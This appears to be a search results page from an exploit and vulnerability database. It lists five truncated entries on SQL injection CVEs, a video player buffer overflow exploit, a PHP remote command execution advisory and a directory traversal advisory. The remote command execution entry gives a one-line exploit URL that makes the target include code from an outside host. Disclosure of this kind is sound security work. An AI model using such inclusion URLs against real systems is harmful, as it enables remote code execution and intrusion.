5 matches found
CVE-2026-10203 OFCMS JSON Query SystemParamController.java query sql injection
A security flaw has been discovered in OFCMS 1.1.3. Impacted is the function Query of the file \ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\system\SystemParamController.java of the component JSON Query Interface. The manipulation results in sql injection. The attack can be launched...
CVE-2024-12364
Improper Neutralization of Special Elements used in an SQL Command 'SQL Injection' vulnerability in Mavi Yeşil Software Guest Tracking Software allows SQL Injection. This issue affects Guest Tracking Software. NOTE: The vendor did not inform about the completion of the fixing process within the...
Total Video Player 1.03 - .m3u File Local Buffer Overflow
Total Video Player 1.03 - .m3u File Local Buffer Overflow /0day Total Video Player V1.03 .m3u file Local Buffer Overflow In this exploit you chose to bind a port or to spawn calc.exe. After I crafted a playlist I observed that the stack got corrupted. The corruption accured in some points,and...
All4WWW-Homepagecreator Remote Command Execution
Script: All4WWW-Homepagecreator Version: v1.0a Vendor: http://www.All4WWW.com I. Bug Code On index.php ... if!$site $site="home"; include "$site.dat"; ... II. Exploit vuln-host/index.php?site=http://host/some-file PS.: The vendor wasn't inform. by DominusVis Infektion Group...
phpWebFileManager v2.0.0 - Directory traversal
RusH security team | http://www.rsteam.ru o----------------------------= Advisory 12 =----------------------------o oxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxo o--------------------------------------------------------------------------o | Product: phpWebFileManage...